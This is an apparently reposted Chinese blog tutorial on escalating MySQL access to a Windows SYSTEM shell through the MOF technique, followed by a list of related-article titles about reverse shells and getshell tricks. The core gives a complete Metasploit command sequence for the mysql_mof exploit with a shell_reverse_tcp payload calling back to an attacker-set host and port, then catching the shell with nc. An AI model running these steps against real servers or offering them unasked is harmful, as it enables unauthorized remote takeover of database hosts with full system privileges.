mysql反弹shell_mysql mof+metasploit反弹shell
鉴于上篇文章 http://z2ppp.blog.51cto.com/11186185/1975985 mysql mof提权
metasploit已经有针对该方式的利用代码,原理还是一样生成mof文件,只是metasploit中可以使用到反弹技术,就不用额外添加用户,前提是对方服务器允许访问公网use exploit/windows/mysql/mysql_mof
set password xxx //设置登录mysql的密码
set username xxx //设置登录mysql的用户
set rhost xxx //设置要登录的ip地址
set rport xxxx //设置mysql的端口号
set payload windows/shell_reverse_tcp //所使用的反弹模块
set lhost xxx //反弹到的ip地址
set lport xxx //反弹到的端口
show options //设置完成后,使用该命令可查看设置参数情况
exploit //执行
如没问题,即exploit执行
这边我们使用nc监听对应端口号,就可以接收到shell了,通常情况为system权限,因为mof文件是由system执行
错误之处,敬请指正
本文出自 “z2p的博客” 博客,请务必保留此出处http://z2ppp.blog.51cto.com/11186185/1975993
mysql mof+metasploit反弹shell
标签:mysql 提权
本条技术文章来源于互联网,如果无意侵犯您的权益请点击此处反馈版权投诉
本文系统来源:http://z2ppp.blog.51cto.com/11186185/1975993
mysql反弹shell_mysql mof+metasploit反弹shell相关推荐
- mysql udf shell_MySQL使用UDF调用shell脚本
前言 在最近的项目中,由于需要使用MySQL的UDF(user defined function),这个特性从未使用过,而且个人觉得这个特性以后应该会经常使用,所以写下博文,记录和分享这个特性的用法. ...
- 监控MySQL数据库的主从状态的shell脚本
本脚本来自有学习阿铭的博文学习: 在大数的互联网公司,其数据库都使用开源的MySQL,其架构也是主从为主,所以监控数据库主从同步情况尤为重要. 提示:本文中的S全部都$符,不要问为什么,马云爸爸的社区 ...
- mysql 备份库的shell_linux备份Mysql数据库shell_MySQL
linux备份Mysql数据库shell_MySQL bitsCN.com 欢迎拍砖,详细内容如下: # MYSQL 数据文件路径 MYSQL_DATA_PATH="/usr/local/m ...
- mysql mof提权原理_(新安全原创精华)Mysql扩展文件MOF提权详讲
本帖最后由 阿甫哥哥 于 2016-8-8 17:24 编辑 哈喽,大家好,我是0x_ALis,我代表新安全网络攻防研究室又来咱们的I春秋发精华帖子了. 希望大家可以支持我们,我们也会做得更好.无论是 ...
- OSCP靶场6-Stapler(用户收集、wordpress、SMB、mysql上传文件执行反弹shell、用户历史命令)
目录 步骤 0:目标发现 第 1 步:TCP 开放端口扫描 第 2 步:TCP 主动端口扫描 步骤 3 主动端口扫描的初步审查 TCP 端口 #139 (SMB) 第 4 步&
- mysql注入反弹_Discuz!x xss反弹后台无防御sql注入getshell(附带exploit)
### 简要描述: Discuz!x xss反弹后台无防御sql注入getshell,这里的xss只是做一个药引子,因为xss来自日志功能,然而这个日志功能却又默认关闭的,为了测试我们开启它.这个漏洞 ...
- linux 下ssh端口反弹,利用ssh隧道反弹shell
说明 本文旨在分析rssh的源代码来学习利用ssh隧道来反弹shell.整个rssh只有1个347行的main文件,所以整体的逻辑结构也比较好分析.关于SSH端口转发的知识可以看实战SSH端口转发这篇 ...
- windows 反弹shell_容器内反弹shell的51种姿势
什么是反弹shell? 反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端.reverse shell与tel ...
- dz mysql导出shell_mysql数据备份并导入数据库shell脚本
#!/bin/bash ############################################# # # mysql手工导入,qa到dev # ######### ...
最新文章
- 基于TensorFlow的简单验证码识别
- java8中的函数式数据处理
- [zz] 几种类间关系:继承、实现、依赖、关联、聚合、组合及UML实现图
- Python过滤掉numpy.array中非nan数据
- MySQL关闭查询缓存(QC)的两种方法
- IMPDP导入实例(oracle)
- tp5微信公众号获取用户openid_tp5+微信公众号获取用户基本信息
- verilog coding style_韩嫕:坚持coding
- getData 函数
- “开房信息泄露案”开审,“B/S架构”酒店管理系统终成酒店大患
- FFMPEG使用摄像头录像并编码
- 计算机控制电机启动接线图,电机控制线路图大全(上下)
- Android开发初体验——创建一个简单的APP
- 湖南省中职计算机应用教资笔试+面试心得
- 理解LaaS、SaaS、PaaS的含义及区别
- Python中用fabric库来远程连接服务器
- 树莓派使用摄像头——fswebcam
- 对激光原理的初步了解
- 进销存系统_用户信息更新密码修改(3)
- std::this_thread::sleep_for 使用